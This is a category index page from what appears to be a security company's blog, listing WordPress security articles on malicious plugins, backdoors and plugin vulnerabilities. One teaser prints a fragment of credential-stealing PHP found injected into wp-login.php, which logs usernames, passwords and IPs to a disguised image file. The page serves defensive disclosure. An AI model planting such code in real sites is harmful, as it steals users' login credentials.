Malicious Plugin Used to Encrypt WordPress Posts
Krasimir Konov During a recent cleanup, we found an interesting malicious WordPress plugin, “WP Security”, that was being used to encrypt blog post content. The website owner…
Browsing Category
WordPress Security
666 posts
Neapolitan Backdoor Injection
Ben Martin Most of us are familiar with Neapolitan ice cream: a flavour whose distinguishing characteristic is not one single flavour but several. Many also know it…
Reverse Hardening WordPress Config
Luke Leal Hardening is the process of securing a website or system against known security weaknesses or potential issues to reduce the attack surface. The more functions…
Plugins Under Attack: July 2019
John Castro A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites: Multi-Vector Attack…
Simple WP login stealer
We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Backdoor plugin hides from view
One of the most important traits for backdoors is the ability to remain undetected by most users — otherwise it may draw suspicion and be…
WPTF Hybrid Composer – Unauthenticated Arbitrary Options Update
With almost 300 installs, WPTF – Hybrid Composer is a framework that helps users easily create custom themes for WordPress. We recently noticed an increase…
Icegram Persistent Cross-Site Scripting
Icegram is a plugin that helps you collect email addresses for your newsletter. Other features include light-box popup offers, header action bars, toast notifications, and…
7 Things You Should Monitor in WordPress Activity Logs
Victor Santoyo WordPress activity logs can be helpful when troubleshooting or trying to identify a hack. In this article, you’ll learn about the seven things you should…
Spam That Fits Your Website
Gabriel Barbosa Most of the time when we talk about spam, we think about mindless machines that create posts or comments to advertise a business related to…
WordPress Plugin WP Statistics: Unauthenticated Stored XSS Under Certain Configurations
Antony Garand The WordPress plugin WP Statistics, which has an active installation base of 500k users, has an unauthenticated stored XSS vulnerability on versions prior to 12.6.7.…